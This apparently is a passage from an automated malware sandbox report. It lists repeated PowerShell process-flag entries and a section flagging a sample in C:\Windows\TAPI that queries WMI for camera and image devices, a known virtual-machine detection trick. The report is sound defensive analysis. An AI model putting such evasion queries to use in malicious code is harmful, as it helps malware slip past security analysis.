                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion

                          barindex
                          Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
